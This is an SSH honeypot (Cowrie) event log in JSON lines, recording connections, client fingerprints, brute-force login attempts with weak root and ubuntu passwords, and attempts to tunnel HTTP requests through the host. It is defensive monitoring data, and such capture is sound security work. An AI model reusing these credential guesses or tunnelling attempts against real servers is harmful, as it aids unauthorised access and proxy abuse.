{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:21.137699Z","src_ip":"213.209.150.239","session":"c2f38abf4b0a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":26677,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf0851258c8e","protocol":"ssh","message":"New connection: 213.209.150.239:26677 (1.2.3.4:22) [session: bf0851258c8e]","sensor":"my-vps","timestamp":"2025-08-26T01:03:21.184138Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:21.184969Z","src_ip":"213.209.150.239","session":"bf0851258c8e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:21.231979Z","src_ip":"213.209.150.239","session":"bf0851258c8e"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":38176,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1bfdf37318d","protocol":"ssh","message":"New connection: 36.89.28.139:38176 (1.2.3.4:22) [session: c1bfdf37318d]","sensor":"my-vps","timestamp":"2025-08-26T01:03:21.266752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:21.267490Z","src_ip":"36.89.28.139","session":"c1bfdf37318d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:03:21.442753Z","src_ip":"36.89.28.139","session":"c1bfdf37318d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:21.467223Z","src_ip":"213.209.150.239","session":"bf0851258c8e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":28257,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:28257","sensor":"my-vps","timestamp":"2025-08-26T01:03:21.515307Z","session":"bf0851258c8e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:21.562854Z","src_ip":"213.209.150.239","session":"bf0851258c8e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":8219,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:8219","sensor":"my-vps","timestamp":"2025-08-26T01:03:21.697772Z","session":"bf0851258c8e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:21.745083Z","src_ip":"213.209.150.239","session":"bf0851258c8e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:21.793197Z","src_ip":"213.209.150.239","session":"bf0851258c8e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":26719,"dst_ip":"1.2.3.4","dst_port":22,"session":"19913c55ced9","protocol":"ssh","message":"New connection: 213.209.150.239:26719 (1.2.3.4:22) [session: 19913c55ced9]","sensor":"my-vps","timestamp":"2025-08-26T01:03:21.839063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:21.839636Z","src_ip":"213.209.150.239","session":"19913c55ced9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:21.887077Z","src_ip":"213.209.150.239","session":"19913c55ced9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:22.120999Z","src_ip":"213.209.150.239","session":"19913c55ced9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":30469,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:30469","sensor":"my-vps","timestamp":"2025-08-26T01:03:22.169160Z","session":"19913c55ced9"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"1q2w3e4r5t","message":"login attempt [ubuntu/1q2w3e4r5t] failed","sensor":"my-vps","timestamp":"2025-08-26T01:03:22.182795Z","src_ip":"36.89.28.139","session":"c1bfdf37318d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:22.216276Z","src_ip":"213.209.150.239","session":"19913c55ced9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":13316,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:13316","sensor":"my-vps","timestamp":"2025-08-26T01:03:22.353514Z","session":"19913c55ced9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:22.400808Z","src_ip":"213.209.150.239","session":"19913c55ced9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:22.449003Z","src_ip":"213.209.150.239","session":"19913c55ced9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":26771,"dst_ip":"1.2.3.4","dst_port":22,"session":"764bfdc200fd","protocol":"ssh","message":"New connection: 213.209.150.239:26771 (1.2.3.4:22) [session: 764bfdc200fd]","sensor":"my-vps","timestamp":"2025-08-26T01:03:22.504756Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:22.505847Z","src_ip":"213.209.150.239","session":"764bfdc200fd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:22.562553Z","src_ip":"213.209.150.239","session":"764bfdc200fd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:22.844992Z","src_ip":"213.209.150.239","session":"764bfdc200fd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":16041,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:16041","sensor":"my-vps","timestamp":"2025-08-26T01:03:22.902623Z","session":"764bfdc200fd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:22.959755Z","src_ip":"213.209.150.239","session":"764bfdc200fd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":30244,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:30244","sensor":"my-vps","timestamp":"2025-08-26T01:03:23.115179Z","session":"764bfdc200fd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:23.172024Z","src_ip":"213.209.150.239","session":"764bfdc200fd"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:23.229367Z","src_ip":"213.209.150.239","session":"764bfdc200fd"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":26830,"dst_ip":"1.2.3.4","dst_port":22,"session":"2409ccfadcc2","protocol":"ssh","message":"New connection: 213.209.150.239:26830 (1.2.3.4:22) [session: 2409ccfadcc2]","sensor":"my-vps","timestamp":"2025-08-26T01:03:23.275564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:23.276438Z","src_ip":"213.209.150.239","session":"2409ccfadcc2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:23.323536Z","src_ip":"213.209.150.239","session":"2409ccfadcc2"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:23.359949Z","src_ip":"36.89.28.139","session":"c1bfdf37318d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:23.558764Z","src_ip":"213.209.150.239","session":"2409ccfadcc2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":26303,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:26303","sensor":"my-vps","timestamp":"2025-08-26T01:03:23.606993Z","session":"2409ccfadcc2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:23.654581Z","src_ip":"213.209.150.239","session":"2409ccfadcc2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":28804,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:28804","sensor":"my-vps","timestamp":"2025-08-26T01:03:23.789665Z","session":"2409ccfadcc2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:23.837204Z","src_ip":"213.209.150.239","session":"2409ccfadcc2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:23.885430Z","src_ip":"213.209.150.239","session":"2409ccfadcc2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":26874,"dst_ip":"1.2.3.4","dst_port":22,"session":"28ea76605ffa","protocol":"ssh","message":"New connection: 213.209.150.239:26874 (1.2.3.4:22) [session: 28ea76605ffa]","sensor":"my-vps","timestamp":"2025-08-26T01:03:23.931048Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:23.932321Z","src_ip":"213.209.150.239","session":"28ea76605ffa"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:23.979124Z","src_ip":"213.209.150.239","session":"28ea76605ffa"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:24.213444Z","src_ip":"213.209.150.239","session":"28ea76605ffa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":4021,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:4021","sensor":"my-vps","timestamp":"2025-08-26T01:03:24.261453Z","session":"28ea76605ffa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:24.308483Z","src_ip":"213.209.150.239","session":"28ea76605ffa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":15921,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:15921","sensor":"my-vps","timestamp":"2025-08-26T01:03:24.445265Z","session":"28ea76605ffa"}
